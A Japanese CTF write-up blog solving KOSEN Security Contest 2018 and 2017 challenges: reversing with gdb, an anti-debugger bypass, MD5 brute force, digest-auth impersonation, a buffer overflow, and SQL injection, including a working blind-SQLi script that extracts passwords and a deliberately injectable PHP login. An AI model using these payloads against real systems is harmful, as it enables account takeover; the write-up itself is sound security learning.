   │0x565556c2 <main+290>   lea    -0x2b(%ebp),%eax       │
   │0x565556c5 <main+293>   push   %eax                   │
   │0x565556c6 <main+294>   lea    -0x4a(%ebp),%eax       │
   │0x565556c9 <main+297>   push   %eax                   │
   │0x565556ca <main+298>   call   0x5655554d <xor_func>  │
  >│0x565556cf <main+303>   add    $0xc,%esp              │
   │0x565556d2 <main+306>   mov    $0x0,%eax              │
   └──────────────────────────────────────────────────────┘
native process 2192 In: main          L??   PC: 0x565556cf 

ここで、xor_funcにスタックで渡している引数3つ(第1引数:-0x4a(%ebp),第2引数:-0x2b,第3引数:-0x69)でどんな値を渡しているか見てみる。

(gdb) x/s $ebp-0x4a
0xffffd57e:     "y8NArwYj>XJgIme3RQhh_M<vo1Z]jXi*{\005\016!2\027\021G7?8*\f\vl 4\t\f"
(gdb) x/s$ebp-0x2b
0xffffd59d:     "*{\005\016!2\027\021G7?8*\f\vl 4\t\f"
(gdb) x/s $ebp-0x69
0xffffd55f:     "SCKOSEN{you_can_read_assembly!}y8NArwYj>XJgIme3RQhh_M<vo1Z]jXi*{\005\016!2\027\021G7?8*\f\vl 4\t\f"

すると、あらふしぎ。フラグがでてきてしまった。 ちなみに、これらの引数は、第1引数と第2引数には、xorを取るための文字列のポインタが格納されていて、第3引数にxorを取ったあとの文字列のポインタが格納されていると考えられる。

(gdb) x/31b $ebp-0x4a
0xffffd57e:     0x79    0x38    0x4e    0x41    0x72    0x77    0x59    0x6a
0xffffd586:     0x3e    0x58    0x4a    0x67    0x49    0x6d    0x65    0x33
0xffffd58e:     0x52    0x51    0x68    0x68    0x5f    0x4d    0x3c    0x76
0xffffd596:     0x6f    0x31    0x5a    0x5d    0x6a    0x58    0x69
(gdb) x/31b $ebp-0x2b
0xffffd59d:     0x2a    0x7b    0x05    0x0e    0x21    0x32    0x17    0x11
0xffffd5a5:     0x47    0x37    0x3f    0x38    0x2a    0x0c    0x0b    0x6c
0xffffd5ad:     0x20    0x34    0x09    0x0c    0x00    0x2c    0x4f    0x05
0xffffd5b5:     0x0a    0x5c    0x38    0x31    0x13    0x79    0x14

ということで、下記のスクリプトでこれらの値同士でxorを取ると、同様にフラグが得られる。

$ cat solve.py 
first = [0x79, 0x38, 0x4e, 0x41, 0x72, 0x77, 0x59, 0x6a,0x3e, 0x58, 0x4a, 0x67, 0x49, 0x6d, 0x65, 0x33,0x52, 0x51, 0x68, 0x68, 0x5f, 0x4d, 0x3c, 0x76,0x6f, 0x31, 0x5a, 0x5d, 0x6a, 0x58, 0x69]
second = [0x2a, 0x7b, 0x05, 0x0e, 0x21, 0x32, 0x17, 0x11,0x47, 0x37, 0x3f, 0x38, 0x2a, 0x0c, 0x0b, 0x6c,0x20, 0x34, 0x09, 0x0c, 0x00, 0x2c, 0x4f, 0x05,0x0a, 0x5c, 0x38, 0x31, 0x13, 0x79, 0x14]
print("".join([chr(f^s) for f,s in zip(first, second)]))
$ python solve.py 
SCKOSEN{you_can_read_assembly!}

Flag:SCKOSEN{you_can_read_assembly!}

05 Simple anti debugger (Binary 250)

[問題内容] gdbにアタッチしてみたが動かない。 どうやって解析しようか。

simple_anti_debuggerというファイルが与えられる。

$ file simple_anti_debugger 
simple_anti_debugger: ELF 32-bit LSB pie executable Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=4f93e375d47f12cba399fa47c23bd59dc32bcde7, not stripped
$ ./simple_anti_debugger 
You don't seem to be using debugger :)
input your password: A
wrong password :(

どうやらアンチデバッグの機能があり、有効なパスワードを入れるとフラグが得られるようだ。 とりあえずXOR,XORと同様に、アセンブリはあまり読みたくないので、まずはradare2で解析。

$ r2 -d simple_anti_debugger
[0xf778b250]> aaa
[0xf778b250]> afl
...
0x56571689    1 4            sym.__x86.get_pc_thunk.dx
0x5657168d    4 82           sym.decode
0x565716df    7 103          sym.is_correct_password
0x56571746    3 73           sym.detect_debugger
0x5657178f    6 242          main
0x56571890    4 93           sym.__libc_csu_init
...
[0xf778b250]> s main
[0x5657178f]> VV
[0x5657178f]> VV @ main (nodes 6 edges 6 zoom 100%) BB-SUMM mouse:canvas-y movements-speed:5                                                                                             


                    .-------------------------------------------.
                    | [0x5657178f] ;[gg]                        |
                    | 0x565717a1 call sym.__x86.get_pc_thunk.bx |
                    | 0x565717c9 call sym.imp.puts              |
                    | 0x565717db call sym.imp.printf            |
                    | 0x565717f5 call sym.imp.fgets             |
                    | 0x56571804 call sym.is_correct_password   |
                    `-------------------------------------------'
                            | |
                            | '--------------------.
               .------------'                      |
               |                                   |
               |                                   |
       .---------------------------------.   .------------------------------.
       |  0x56571810 ;[gj]               |   |  0x5657184f ;[gf]            |
       | 0x5657181a call sym.decode      |   | 0x56571859 call sym.imp.puts |
       | 0x5657182c call sym.imp.puts    |   `------------------------------'
       | 0x56571845 call sym.imp.printf  |       |
       `---------------------------------'       |
           |                                     |
           '-----------------------.             |
                                   .-------------'
                                   |
                                   |
                               .--------------------.
                               |  0x56571861 ;[gi]  |
                               `--------------------'
                                       | |
                                       | '--------------.
        .------------------------------'                |
        |                                               |
        |                                               |
.--------------------------------------------.    .--------------------.
|  0x56571872 ;[gm]                          |    |  0x56571877 ;[gk]  |
| 0x56571872 call sym.__stack_chk_fail_local |    `--------------------'
`--------------------------------------------'

関数一覧を見ると、いくつかの主要な関数が見つかり、おそらくエンコードされているフラグをデコードするdecode、アンチデバッグの機能を持つであろうdetect_debuggerなども見つかった。 しかしmainではdetect_debuggerは呼ばれていなかった。 mainの処理を見てみると、0x565717f5で文字列を受け取り、is_correct_passwordを呼び出し、その結果次第で、処理が変わっているようにみえる。

以上のことを踏まえて、detect_debuggeris_correct_passwordブレークポイントを仕掛けてgdbデバッグしてみる。

$ gdb -q ./simple_anti_debugger
Reading symbols from ./simple_anti_debugger...(no debugging symbols found)...done.
(gdb) b is_correct_password
Breakpoint 1 at 0x6e3
(gdb) b detect_debugger
Breakpoint 2 at 0x5655574a
(gdb) run
Starting program: /root/workspace/ctf/kosensc2018/Binary_250/simple_anti_debugger 

Breakpoint 2, 0x5655574a in detect_debugger ()
(gdb) layout asm
   ┌──────────────────────────────────────────────────────────────────────────┐
B+>│0x5655574a <detect_debugger+4>  sub    $0x4,%esp                          │
   │0x5655574d <detect_debugger+7>  call   0x56555590 <__x86.get_pc_thunk.bx> │
   │0x56555752 <detect_debugger+12> add    $0x186a,%ebx                       │
   │0x56555758 <detect_debugger+18> push   $0x0                               │
   │0x5655575a <detect_debugger+20> push   $0x1                               │
   │0x5655575c <detect_debugger+22> push   $0x0                               │
   │0x5655575e <detect_debugger+24> push   $0x0                               │
   │0x56555760 <detect_debugger+26> call   0x56555530 <ptrace@plt>            │
   │0x56555765 <detect_debugger+31> add    $0x10,%esp                         │
   │0x56555768 <detect_debugger+34> cmp    $0xffffffff,%eax                   │
   │0x5655576b <detect_debugger+37> jne    0x56555789 <detect_debugger+67>    │
   │0x5655576d <detect_debugger+39> sub    $0xc,%esp                          │
   │0x56555770 <detect_debugger+42> lea    -0x168c(%ebx),%eax                 │
   │0x56555776 <detect_debugger+48> push   %eax                               │
   │0x56555777 <detect_debugger+49> call   0x565554f0 <puts@plt>              │
   │0x5655577c <detect_debugger+54> add    $0x10,%esp                         │
   │0x5655577f <detect_debugger+57> sub    $0xc,%esp                          │
   │0x56555782 <detect_debugger+60> push   $0x1                               │
   │0x56555784 <detect_debugger+62> call   0x56555500 <exit@plt>              │
   │0x56555789 <detect_debugger+67> nop                                       │
   │0x5655578a <detect_debugger+68> mov    -0x4(%ebp),%ebx                    │
   │0x5655578d <detect_debugger+71> leave                                     │
   │0x5655578e <detect_debugger+72> ret                                       │
   └──────────────────────────────────────────────────────────────────────────┘
native process 2340 In: detect_debugger                   L??   PC: 0x5655574a 

どうやら0x56555768%eax$0xffffffff(-1)と一致してしまうと、exitしてしまうことがわかった。

(gdb) b *0x56555768
Breakpoint 3 at 0x56555768
(gdb) c
Continuing.

Breakpoint 3, 0x56555768 in detect_debugger ()
(gdb) p/x $eax
$1 = 0xffffffff
(gdb) set $eax = 0
(gdb) p/x $eax
$2 = 0x0
(gdb) c
Continuing.
You don't seem to be using debugger :)
input your password: A
Breakpoint 1, 0x565556e3 in is_correct_password ()

そこで、0x56555768ブレークポイントを仕掛けて、処理を進める。 そして、ブレークポイント地点で、%eaxレジスタの値を変えて、アンチデバッグを回避し、さらに処理を進める。 アンチデバッグを回避でき、処理を進めると、passwordの入力画面になる。 適当な値を入力すると、次はis_correct_passwordブレークポイントで処理が停止する。

   │0x5655572c <is_correct_password+77>     cmpl   $0xa5,-0x10(%ebp)                                                           │
   │0x56555733 <is_correct_password+84>     jne    0x5655573c <is_correct_password+93>                                         │
   │0x56555735 <is_correct_password+86>     mov    $0x1,%eax                                                                   │
   │0x5655573a <is_correct_password+91>     jmp    0x56555741 <is_correct_password+98>                                         │
   │0x5655573c <is_correct_password+93>     mov    $0x0,%eax                                                                   │
   │0x56555741 <is_correct_password+98>     mov    -0x4(%ebp),%ebx                                                             │
   │0x56555744 <is_correct_password+101>    leave                                                                              │
   │0x56555745 <is_correct_password+102>    ret                                                                                │

ここで、is_correct_passwordの分岐処理をよく見てみると、どうやら-0x10(%ebp)の値が$0xa5でなければ、%eaxには0が、$0xa5であれば$eaxには1という値が入るということがわかった。

   │0x56555804 <main+117>   call   0x565556df <is_correct_password>                                                            │
   │0x56555809 <main+122>   add    $0x10,%esp                                                                                  │
   │0x5655580c <main+125>   test   %eax,%eax                                                                                   │
   │0x5655580e <main+127>   je     0x5655584f <main+192>                                                                       │
   │0x56555810 <main+129>   sub    $0xc,%esp                                                                                   │
   │0x56555813 <main+132>   lea    0x4c(%ebx),%eax                                                                             │
   │0x56555819 <main+138>   push   %eax                                                                                        │
   │0x5655581a <main+139>   call   0x5655568d <decode>                                                                         │

mainの処理も見てみると、フラグをデコードしてくれるdecodeを飛ばさないためには、%eax1である必要があるということがわかった。

(gdb) b *0x5655580c
Breakpoint 4 at 0x5655580c
(gdb) c
Continuing.

Breakpoint 4, 0x5655580c in main ()
(gdb) set $eax = 1
(gdb) c
Continuing.
correct password!
flag is SCKOSEN{I_like_debugger}
[Inferior 1 (process 2340) exited normally]

最後に、0x5655572cブレークポイントをしかけて、そこまで処理を進め、%eax1を代入、そして処理を最後まで進めることで、フラグが得られた。

Flag: SCKOSEN{I_like_debugger}

06 exchangeable if (Crypto 100)

[問題内容] 画像を見つけた。フラグを取り出せ!

f:id:ush1ken:20180902185634j:plain

out.jpegという画像が与えられる。 ひとまず、調査。

$ file out.jpg 
out.jpg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5, description=md5=2009d1c114ed83f57cf8adde69fd6ca8, xresolution=112, yresolution=120, resolutionunit=1], baseline, precision 8, 500x500, frames 3
$ exiftool out.jpg 
ExifTool Version Number         : 10.32
File Name                       : out.jpg
Directory                       : .
File Size                       : 10 kB
File Modification Date/Time     : 2018:09:02 18:54:57+09:00
File Access Date/Time           : 2018:09:02 18:57:27+09:00
File Inode Change Date/Time     : 2018:09:02 18:54:57+09:00
File Permissions                : rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Exif Byte Order                 : Big-endian (Motorola, MM)
Image Description               : md5=2009d1c114ed83f57cf8adde69fd6ca8
X Resolution                    : 1
Y Resolution                    : 1
Resolution Unit                 : None
Y Cb Cr Positioning             : Centered
Image Width                     : 500
Image Height                    : 500
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 500x500
Megapixels                      : 0.250

exiftoolImage Descriptionに怪しいmd5=2009d1c114ed83f57cf8adde69fd6ca8があることがわかる。 はじめは、このout.jpegのファイルサイズを削ったら同じmd5ハッシュになるのかなぁ、などと考えていたが、チームメンバーが「フラグのハッシュなんじゃない?」と閃いてくれたので、あとはスクリプトを書くだけ。

import hashlib, sys
from itertools import product
from string import digits, ascii_uppercase, ascii_lowercase

if __name__ == '__main__':
 md5 = "2009d1c114ed83f57cf8adde69fd6ca8"
 x = ""
 before = "SCKOSEN{sHDtF1"
 after = "NLTIWp}"
 chars = digits + ascii_uppercase + ascii_lowercase
 i = 0
 for comb in product(chars, repeat=4):
  flag = before + "".join(comb) + after
  if md5 == hashlib.md5(flag.encode('utf-8')).hexdigest():
   print("\nOK:", flag)
   break
  else:
   sys.stdout.write("\r"+flag+"\t"+str(i))
  i += 1
$ time python bf.py 
SCKOSEN{sHDtF1qOLYNLTIWp}   12486648
OK: SCKOSEN{sHDtF1qOLZNLTIWp}

real    2m51.198s
user    1m56.965s
sys 0m20.551s

(数字10種類+大小英数字52種類)^4だと計算終わらないんじゃ無いかと思っていたが、意外といけた。

Flag: SCKOSEN{sHDtF1qOLZNLTIWp

11 ログインしてフラグを入手せよ。 (Network 150)

[問題内容] ヒント: 我々は秋葉原ラジオ会館上空に飛来したタイムマシンを用いて、未来の超高性能コンピュータを入手した。 そのコンピュータによると、MD5の値2b21424f30227ac8bc08c69216c30815のハッシュ化前の値は以下であるらしい。 c932836c1feff27841c03453e81d5b13:oX3Ar2V0BQA=34c6176e8e33d6da83cc500028b8f9c8de95b91d:00000001:OWEyZWEyNmZhNzAyYTUwMzM0MzRjYzMxZDljZGY2OTU=:auth:71998c64aea37ae77020c49c00f73fa8

digest.pcapというファイルが与えられる。 digest.pcapを開いて、httpでフィルターすると、以下のようになる。 f:id:ush1ken:20180902194121p:plain 問題とファイル名からして、ヒントとpcapファイルを使って、なりすましdigest認証をすればフラグが得られると予想できる。

digest認証では、最初のアクセス時にサーバーから401 Unauthorizedレスポンスと一緒にrealmnoncealgorithmqopなどの値が与えられる(このうちnonceのみ認証ごとに変化する)。 そして、クライアントはその情報に、usernameuricnoncencresponse(、Method)といった値を追加して、認証を行う。 この際、cnoncencはブラウザから与えられ、uriはアクセス先のuriである。 つまり、認証を行う際に必要なパラメータはusernameresponseである。 usernameは、WireSharkのHTTPリクエストを見てみると、はtanakaであるということがわかる。 また、responseという値は次のように計算される。

A1 = md5(username+':'+realm+':'+password)
A2 = md5(Method+':'+uri)
response = md5(A1+':'+nonce+':'+nc+':'+cnonce+':'+qop+':'+A2)

ここで、ヒントを見返してみると、2b21424f30227ac8bc08c69216c30815という値はresponse値であるということが予測できる。 さらにそのmd5ハッシュ化前の値から、A1の値がc932836c1feff27841c03453e81d5b13であるということがわかる。 A1という値は認証ごとに変わる値ではなく、また、usernamepasswordの情報が入っている。 つまり、このA1の値を使えばdigest認証をなりすましで通過できる。

あとは、このA1の値を使ってresponseを計算するスクリプトを使って、なりすませばフラグが得られる。

# -*- coding: utf-8 -*-
import hashlib, sys

def md5(s):
 return hashlib.md5(s.encode('utf-8')).hexdigest()

if __name__ == '__main__':
 argv = sys.argv
 nonce = argv[1]    # nonce
 cnonce = argv[2]   # cnonce

 username = "tanaka"
 realm = "Digest Auth"
 Method = "GET"
 uri = "/flag.txt"
 A2 = md5(Method+":"+uri)
 nc = "00000001"
 qop = "auth"
 A1 = "c932836c1feff27841c03453e81d5b13"

 res = md5(A1+":"+nonce+":"+nc+":"+cnonce+":"+qop+":"+A2)
 print("response=\""+res+"\"")
$ python auth.py Gh+DNeJ0BQA=cfa1b451b276606f5d76d67078c7b67175ebcbe2 4472a6b551127b86dc86c741971d5c26
response="c21a4ec23b01467b2cb0ad188dab4583"

f:id:ush1ken:20180902210802p:plain f:id:ush1ken:20180902210957p:plain

Flag: SCKOSEN{digest_auth_is_secure!}

14 アカウントを奪え (Web 300)

[問題内容] アカウントを奪ってしまおう。 フラグはSCKOSEN{keyword}の形で、keywordを探してほしい。

URLにアクセスすると、フォームがあり"kosenjoh"ユーザーでログインしてくださいとある。 いつものSQL(' or 1=1 --)を投げてあげると、ログインに成功し、次のようなソースコードが出力される。 f:id:ush1ken:20180902231129p:plain

フラグは、'kosenjoh' ユーザーのパスワードです。 
Hello, Hacker!!! 古戦場から逃げるな!!

<?php
    function h($ret)
    {
        return htmlspecialchars($ret, ENT_QUOTES, 'UTF-8');
    }
    if ($_SERVER['REQUEST_METHOD'] == "POST") {
        $userid = $_POST['userid'];
        $pass = $_POST['pass'];
        $check = false;

        if (strlen($userid) !== 0 and strlen($pass) !== 0) {
            $err = '';
            if ($userid !== '') {
                try {
                    $dbh = new PDO('sqlite:../database/user.db');
                    $result = $dbh->query("SELECT count(*) as count FROM user WHERE userid='$userid' AND pass='$pass'");
                    if ($result !== false) {
                        $result = $result->fetch(PDO::FETCH_ASSOC);
                        if ($result["count"] > 0) {
                            $check = true;
                        }
                    }
                } catch (Exception $e) {
                    //echo $e->getMessage();
                }
                if (!$check) {
                    $err = 'ログインに失敗しました.....XD';
                }
            }
        } else {
            $err = "UseridとPasswordを入力してください。";
        }
    } else {
        $userid = "";
        $pass = "";
        $err = "";
        $check = false;
    }
?>

ただし、フラグは問題文にある通り、kosenjohユーザーのパスワードなので、それを抜き出さなければいけない。 ここで、このWebサーバーのホスト名にもある通り、bsql(Blind SQL Injection)をして、情報を抜き出す。

今は、' or 1=1 --1=1の部分が今は必ずTrueになってログインに成功する。 そこで、その部分をある条件のもとでTrueになる、というふうに書き換えれば、bsqliで情報を抜き出すことができる。

具体的には、ソースコードからテーブル名、カラム名がわかっているので、' or length((select pass from user where id='kosenjoh')) < 30 --といったクエリを投げる。 ここで、(select pass from user where id='kosenjoh')、つまりkosenjohのパスワードの長さが30文字未満であれば、この条件はTrueとなり、ログインに成功する。 そうでなければ、ログインに失敗する。 これを使ってまず、kosenjohのパスワードの長さは24文字だということがわかった。

つぎに、' or hex(substr((select pass from user where userid='kosenjoh'), 1, 1)) < hex('a') --のようなクエリを投げる。 ここで、substr(pass, 1, 1)passの1文字目から1文字だけ取り出し、それをhex()アスキーコードに変換し、数値で比較する。 これを使うことで、1文字ずつフラグを割り出すことができた。

ちなみに、競技中は完全に手動で1文字ずつ割り出しており、かなり時間もかかった。 (その分、手動バイナリサーチの達人となった。) そこで、勉強もかねて、バイナリサーチを使ったBlind SQL Injectionのスクリプトを作成した。

import requests
from string import digits, ascii_uppercase, ascii_lowercase

url = "http://bsql.kosensc2018.tech"
s = requests.session()
chars = digits + ascii_uppercase + ascii_lowercase

def asm_params(i, f, c):
 sql = "' or hex(substr((select pass from user where userid='kosenjoh'), {}, 1)) {} hex('{}') --".format(i, f, c)
 params = {"userid": "kosenjoh", "pass": sql}
 return params

def bin_search(i, imin, imax):
 imid = int(round(imin + (imax - imin) / 2))
 if "Hacker" in s.post(url, data=asm_params(i, ">", chars[imid])).text:
  return bin_search(i, imid+1, imax)
 elif "Hacker" in s.post(url, data=asm_params(i, "<", chars[imid])).text:
  return bin_search(i, imin, imid-1)
 else:
  return imid

if __name__ == "__main__":
 flag = ""
 for i in range(1,25):
  flag += chars[bin_search(i, 0, 62)]
  print(flag)
$ python bsql.py 
s
sk
sku
skur
skura
skuraf
skurafj
skurafji
skurafjit
skurafjitm
skurafjitmi
skurafjitmiy
skurafjitmiym
skurafjitmiymt
skurafjitmiymto
skurafjitmiymtok
skurafjitmiymtoki
skurafjitmiymtokit
skurafjitmiymtokitm
skurafjitmiymtokitmr
skurafjitmiymtokitmrp
skurafjitmiymtokitmrpe
skurafjitmiymtokitmrpec
skurafjitmiymtokitmrpeco

Flag: SCKOSEN{skurafjitmiymtokitmrpeco}

15 47405b599e22969295ebed486d7343cb (Web 300)

[問題内容] Find the flag!

URLにアクセスすると、Find the flag.とあり、フォームが2つある。

f:id:ush1ken:20180902234250p:plain

上のフォームにいつものSQL(' or 1=1 --)を入れるとSearch Result:と出て、テーブル全体が抜き出せる。

f:id:ush1ken:20180902234255p:plain

このテーブルは83行あり、Valueアスキー変換すると下記のような文章が出てきた。

$ python
s = [83,111,114,114,121,46,46,46,32,58,60,10,84,104,105,115,32,118,97,108,117,101,115,32,97,114,101,110,39,116,32,102,108,97,103,46,46,46,10,10,72,105,110,116,58,10,84,104,105,115,32,102,108,97,103,32,105,115,32,116,104,101,32,115,111,109,101,111,110,101,39,115,32,112,97,115,115,119,111,114,100,46,10]
print("".join([chr(c) for c in s]))

Sorry... :<
This values aren't flag...

Hint:
This flag is the someone's password.

上のフォームはダミーであることがわかったので、つぎに下のフォームにいつものSQL(' or 1=1 --)を入れたところError: Multiple Result is NOT allowed!というエラーを吐かれた。 リザルトが複数あるのはダメだよ〜ということなのでLIMIT句をつかって、' or 1=1 limit 1 --としたところWelcome!と出力された。 ということで、ここでも前問と同じBlind SQL Injectionを使ってフラグを抜き出す。

前問と違うのは、ユーザー名がわからないことである。 そこで、' or (select count(*) from user) > 10 limit 1--というクエリを投げることで、まずユーザー数を探る。 しかし、SQLITE_ERROR: no such table: userというエラーが出力された。 テーブル名についてもbsqliしても良かったが、チームメンバーusersというテーブルを見つけてくれた。 そして、' or (select count(*) from users) = 6 limit 1--というクエリでWelcome!が表示されたので、ユーザー数は6人であることがわかった。

つぎに、1番上のユーザー名を探る。 しかし、' or length((select userid from users limit 1)) > 30 limit 1--というクエリを投げたところまたSQLITE_ERROR: no such column: useridというエラーが出力された。 カラム名についてもbsqliしても良かったが、これも運よくフォームのname属性と同じ、idというカラムがユーザー名に該当するということがわかった。 そして、' or length((select id from users limit 1)) = 5 limit 1--というクエリでWelcome!が表示されたので、1番目のユーザー名の文字数は5文字であることがわかった。 5文字ということがわかったので、' or hex(substr((select id from users limit 1), 1, 1)) > hex("a") limit 1--といったクエリで探った結果、1番目のユーザー名はAdminであることがわかった。

それっぽいユーザー名なのでひとまず、Adminというユーザーのパスワードを前問と同じ要領で探ると、フラグが出てきた。

ちなみに、この問題でも前問と同じスクリプトで試してみた。

$ time python bsql.py 
S
SC
SCK
SCKO
SCKOS
SCKOSE
SCKOSEN
SCKOSEN{
SCKOSEN{W
SCKOSEN{W2
SCKOSEN{W22
SCKOSEN{W22X
SCKOSEN{W22Xx
SCKOSEN{W22Xxn
SCKOSEN{W22Xxnq
SCKOSEN{W22Xxnq9
SCKOSEN{W22Xxnq9g
SCKOSEN{W22Xxnq9g8
SCKOSEN{W22Xxnq9g8r
SCKOSEN{W22Xxnq9g8rf
SCKOSEN{W22Xxnq9g8rfn
SCKOSEN{W22Xxnq9g8rfnE
SCKOSEN{W22Xxnq9g8rfnEH
SCKOSEN{W22Xxnq9g8rfnEHG
SCKOSEN{W22Xxnq9g8rfnEHGy
SCKOSEN{W22Xxnq9g8rfnEHGyD
SCKOSEN{W22Xxnq9g8rfnEHGyDJ
SCKOSEN{W22Xxnq9g8rfnEHGyDJ7
SCKOSEN{W22Xxnq9g8rfnEHGyDJ7A
SCKOSEN{W22Xxnq9g8rfnEHGyDJ7AJ
SCKOSEN{W22Xxnq9g8rfnEHGyDJ7AJ8
SCKOSEN{W22Xxnq9g8rfnEHGyDJ7AJ8t
SCKOSEN{W22Xxnq9g8rfnEHGyDJ7AJ8tF
SCKOSEN{W22Xxnq9g8rfnEHGyDJ7AJ8tFg
SCKOSEN{W22Xxnq9g8rfnEHGyDJ7AJ8tFg}
172

real    0m3.777s
user    0m1.397s
sys 0m0.361s

4秒未満で、試行回数172回で35文字の文字列の抽出に成功できた。

Flag: SCKOSEN{W22Xxnq9g8rfnEHGyDJ7AJ8tFg}

おわりに

今回は、いつもより多く問が解けたので、とても楽しかったし、とても勉強になりました。 競技時間はもう少し長めでもいいかなあとは思います。 競技終了後も問題サーバーにしばらくアクセスできるのはとてもいいと思います。 あと手動二分探索力が圧倒的につきました。 全完したかった。。!

運営、その他関係者の皆様、楽しく、とても勉強になる大会をありがとうございました。

KOSEN セキュリティコンテスト 2017 に参加したおはなし

はじめに

KOSENセキュリティコンテスト2017にPwnPwnPainとして参加してきました。
参加は2度目で、今年は去年とは打って変わって「Jeopardy」と「KoH(King of Hill)」形式でのCTFでした(去年はサーバーの脆弱性を潰すHardening的な形式?でした)。 レベル感は全体的には低めに感じましたが、まだまだ力及ばずな問題もありました。

とりあえず、備忘録、復習の記録ってのも兼ねて、競技時間中に解けた問題と、終わってから解けた問題のWriteupをカテゴリーごとにゆるーく書きたいと思います。

また、Writeupにて、出力や入力が極端に長い場合、...として省略させていただきます。

f:id:ush1ken:20171023000720p:plain

目次

Sample

00 _ サンプル _ 100

これはサンプル問題である。 今回出題される問題は、全て答えとなる「フラグ」が含まれている。
フラグは、必ずSCKOSEN{hoge}の形式になっている。
この問題のフラグはSCKOSEN{Let's enjoy}である。入力しろ。

Flag: SCKOSEN{Let's enjoy}

Binary

01 _ フラグを答えろ _ 100

正しいフラグを書けば正しいかどうかを判定してくれる、便利なアプリを開発した。
フラグを調べて解答せよ

a.outという実行ファイルが配布されるので、何も考えずにstringsコマンド...

$ strings a.out 
/lib64/ld-linux-x86-64.so.2
{e#yd
libc.so.6
puts
__stack_chk_fail
stdin
printf
strtok
fgets
strcmp
__libc_start_main
__gmon_start__
GLIBC_2.4
GLIBC_2.2.5
UH-`
SCKOSEN{H
h1dden_fH
1ag}

一応実行してみる。

# ./a.out    
Enter the FLAG: SCKOSEN{h1dden_f1ag}   
correct! the flag is SCKOSEN{h1dden_f1ag}

Flag: SCKOSEN{h1dden_f1ag}

02 _ ファイル名を探せ _ 100

フラグは簡単だ、ファイル名に隠した。

qというファイルが渡されるので、何も考えずにfileコマンド...

$ file q
q: POSIX tar archive (GNU)

tarファイルということなので、解凍。

$ tar xvf tmp 
x q/
x q/xNUMaohRhJu8EJTLRx0ivRfwXk3cc
x q/y2Ce56H56EVYwO7tWgOXo726O0uXp
x q/h14PySClySuaKQ6kxjLYWhq99ibhm
x q/2bTq1nVLWdgX6aypu018Yl84ubSsE
x q/VgiiZE4hEprvEWdLnsO4G8KbOHUTi
x q/G0wmRiMSrE1uArCttTbnd1wefAFad
x q/8Q0VABE4ellLGwRVQtb640YcDXCB2
x q/arRyqJbDkwFhzfSvDJEbpvlGYJy3q
x q/BNpv17Z6xGJhMatl91SZbU5MRErTa
...

なんかqっていうディレクトリにファイルがたくさん(18888個)でてくる。
ファイルの中には何も書かれていないので、とりあえずファイル名をbase64デコードしてみるも、Incorrect Paddingと言われる。
冷静になって考えたら、18888個の中にフラグがあるのでは、と思ってgrepしてみる。

$ ls q | grep SCKOSEN
SCKOSEN{ki_ha_mori_ni_kakuse}

Flag: SCKOSEN{ki_ha_mori_ni_kakuse}

03 _ ボスを倒せ _ 200

とあるゲームを見つけたのだが、ボスがあまりにも強すぎて一切倒せそうにない。
どうにか倒す方法はないだろうか?
ゲームへの接続方法: nc [hostname] [port] 例: nc www.ctfkit 8050

この問題は、チームメンバーが適当にBoFしようとしたら解けた問題。。
ちゃんとロジックを考えるために、競技終了間際に挙動をメモったので復習。

とりあえずncで接続。

$ nc score.kosensc2017.tech 40048
Input your name: AAAAA
Player's HP: 1000
Boss's HP: 12345678
Next round=>^Z

たぶん、最初の入力にBoFがあるんだろうなあ、と考えてAをいっぱい入れてみる。

$ nc score.kosensc2017.tech 40048
Input your name: AAAAAAAAAAAAAAAAAAAAAA 
Player's HP: 1094795585
Boss's HP: 16705
Next round=>^Z

お、減った。ということで、16075をpythonhex(16075)してみると見事'0x4141'という出力に。
ここで、入力したAは22個なので、1個減らせばボスのHPは0x41で65になるのでは、と思うものの65だとちょっとまだ強い()ので、スペースBoF。(なぜかecho -eで\x01とかが流し込めなかった、、)

$ nc score.kosensc2017.tech 40048
Input your name: AAAAAAAAAAAAAAAAAAAA 
Player's HP: 1094795585
Boss's HP: 32
Next round=>1

Round 1/10
    Player's Attack!
    Boss's HP: 21 (-11)
    Boss's Attack!
    Player's HP: 1094795419 (-166)
Next round=>
Round 2/10
    Player's Attack!
    Boss's HP: 12 (-9)
    Boss's Attack!
    Player's HP: 1094795244 (-175)
Next round=>1

Round 3/10
    Player's Attack!
    Boss's HP: 3 (-9)
    Boss's Attack!
    Player's HP: 1094795069 (-175)
Next round=>
Round 4/10
    Player's Attack!
    Boss's HP: 0 (-10)
    Boss's Attack!
    Player's HP: 1094794937 (-132)
You win!
Flag is SCKOSEN{buffer_over_flow!}

Flag: Flag is SCKOSEN{buffer_over_flow!}

04 _ OreNoFS _ 500

このファイルraw.dmgには、どうも独自のファイルシステムが構築されているらしい。 このファイルシステムに格納されたデータは1つ、そのデータを復元しよう。
このファイルシステムは、クラスタ単位で管理されており、1クラスタ=4096byteであることは分かっている。
また、AllocationTableというFATファイルシステムでいうFAT領域とディレクトリエントリ、データ格納領域に分けられているようだ。
また、GUID Partition Table(GPT)でフォーマットされているので、その分はクラスタの管理外である点に注意しなければならない。
ATは2byte*8192、ディレクトリエントリは32byteで下記の構造体で定義されているらしい。

 struct directory_entry {
         unsigned char magic;(1byte) 
         char filename[8];
         char extension[3];
         unsigned int size;(4byte) 
         unsigned long offset_of_cluster;(2byte) 
         char attribute[12];
         unsigned long reserved;(2byte) 
};

解けなかったので他の方のwriteupを読んで解きたい。。

Crypto

05 _ 簡単な暗号化2 _ 100

ファイルからフラグを探せ

チームメンバーが、1日目の夜に解いてくれた問題。

問題ファイルにアクセスすると、base64っぽい文字列がずらーっと並んでいたので、コピペして、pythonに流し込んでdecodeしてみる。

$ python
>> import base64
>> input = '''
NGI1MDA0MDMwMDE0MDgwODAwMDgyYzU2NGI1MzAwMDAwMDAwMDAwMDAwMDAwMDAw...
'''
>>> base64.b64decode(("".join(input.split('\n'))))
'4b5004030014080800082c564b53000000000000000000000000000b0000725f6c652f73722e6c65ad73dd92034a0c41ef...'
>>> len(base64.b64decode(("".join(input.split('\n')))))
8520

decodeしてみると、何かのファイルのバイナリっぽい何かが出てくる。
